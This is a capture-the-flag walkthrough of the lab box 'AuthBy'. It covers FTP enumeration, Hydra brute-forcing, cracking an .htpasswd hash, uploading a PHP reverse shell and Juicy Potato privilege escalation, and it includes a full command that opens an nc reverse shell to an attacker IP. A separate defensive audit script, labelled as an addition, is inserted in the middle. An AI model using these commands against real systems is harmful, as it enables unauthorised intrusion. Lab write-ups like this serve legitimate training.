AuthBy
Source: Proving Grounds | OS: Windows | Community Rating: Hard
I started with the usual autorecon, which revealed the following open ports:
FTP (21)
HTTP (242)
3145, 3389
FTP allowed anonymous login, so I began there. Although I could only list directories and not download files, I noticed an "accounts" folder containing usernames:
offsec
admin
anonymous
The HTTP service, however, required credentials to proceed.
I used Hydra with the -e nsr flag to brute-force the accounts. The admin account worked with the password "admin". While the admin credentials didn't work on the HTTP site, they did grant access to FTP. Using the command wget -r ftp://admin:admin@192.168.118.46 I downloaded the FTP files. After some digging and going in circles, I discovered a hidden file that I hadn't initially noticed, .htpasswd, which contained a hashed password for offsec. Running John against it, I cracked the hash; the password turned out to be "elite".
Now with offsec credentials, I logged into the HTTP server and noticed that the index.html there was identical to the one on the FTP server. This indicated that the FTP root and the web root were the same directory, so I could upload a shell via FTP (using the admin account) and then access it over HTTP with the offsec account. I first tried pentestmonkey's PHP reverse shell, which connected briefly and then crashed; I switched to Ivan Sincek's PHP shell, and it finally worked. I was in.
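A defender-side check for the root cause described above (one directory served both by FTP and by the web server), added here as an example and not part of the original writeup: it walks a constructed directory tree and flags an FTP-writable web root and any .htpasswd reachable over FTP. The paths, the sample tree and the function names are assumptions.

```python
"""Audit a directory exposed both as an FTP root and as a web document root,
the configuration that turned an FTP upload into an HTTP-executed PHP shell.
Added example; the sample tree below is constructed, not taken from the box."""
import os
import tempfile

SENSITIVE_NAMES = {".htpasswd", ".htaccess"}     # credential/config files
SCRIPT_EXTENSIONS = {".php", ".phtml", ".php5"}  # executed by the web server


def audit_shared_root(ftp_root, web_root, ftp_writable):
    """Return a list of (severity, path, reason) findings.

    ftp_root     - directory served by the FTP daemon
    web_root     - web server document root
    ftp_writable - True if any FTP account (anonymous or authenticated)
                   may upload into ftp_root
    """
    findings = []
    ftp_real = os.path.realpath(ftp_root)
    web_real = os.path.realpath(web_root)
    # The web root is "shared" when it is the FTP root or lives inside it.
    shared = os.path.commonpath([ftp_real, web_real]) == ftp_real
    if shared and ftp_writable:
        findings.append(("critical", web_real,
                         "FTP-writable directory is served by the web server: "
                         "an uploaded script runs as the web service account"))
    for dirpath, _dirs, files in os.walk(ftp_real):
        for name in files:
            path = os.path.join(dirpath, name)
            if name in SENSITIVE_NAMES:
                findings.append(("high", path,
                                 "credential/config file readable over FTP"))
            if shared and os.path.splitext(name)[1].lower() in SCRIPT_EXTENSIONS:
                findings.append(("medium", path,
                                 "server-side script inside FTP-exposed web root"))
    return findings


def build_sample_tree(extra_files=()):
    """Constructed layout mirroring the writeup: index.html, .htpasswd, accounts/."""
    root = tempfile.mkdtemp(prefix="authby_")
    os.mkdir(os.path.join(root, "accounts"))
    names = ("index.html", ".htpasswd", os.path.join("accounts", "offsec"))
    for name in names + tuple(extra_files):
        with open(os.path.join(root, name), "w") as fh:
            fh.write("sample\n")
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for sev, path, why in audit_shared_root(root, root, ftp_writable=True):
        print(f"[{sev}] {path}: {why}")
```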
Running whoami /priv revealed that I had the SeImpersonatePrivilege privilege.
I checked the system info to determine whether the server was 64-bit or 32-bit and then downloaded several PoCs. None worked until I resorted to Juicy Potato. I used certutil to download the necessary files.
After uploading both nc and Juicy Potato, I tried running Juicy Potato with the default CLSID; it didn't work at first, so I tested different ones until one succeeded: .\Juicy.Potato.x86.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\bin\apache\Apache2.2.21\nc.exe -e cmd.exe 192.168.45.231 5555" -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
FTP Enumeration: Even with anonymous login, checking directories (like “accounts”) can reveal valid usernames.
Brute Force is Key: Using Hydra with the proper flags can uncover weak credentials quickly.
Hidden Files Matter: Don’t overlook hidden files on FTP servers—.htpasswd provided the offsec password here.
File Transfer Tools: Using wget -r to download all FTP files can save a lot of time.
Shell Stability: If one PHP shell doesn’t work (like pentestmonkey’s), try alternatives until you get a stable connection.
Windows Nuances: Remember that on Windows, commands are executed with .\ rather than ./, and rlwrap can improve shell usability with nc.
Certutil for File Uploads: Certutil is a useful tool for transferring files, as demonstrated when downloading Juicy Potato and nc.
Privilege Escalation with Juicy Potato: Leveraging SeImpersonatePrivilege through Juicy Potato can be a gateway to Windows privilege escalation.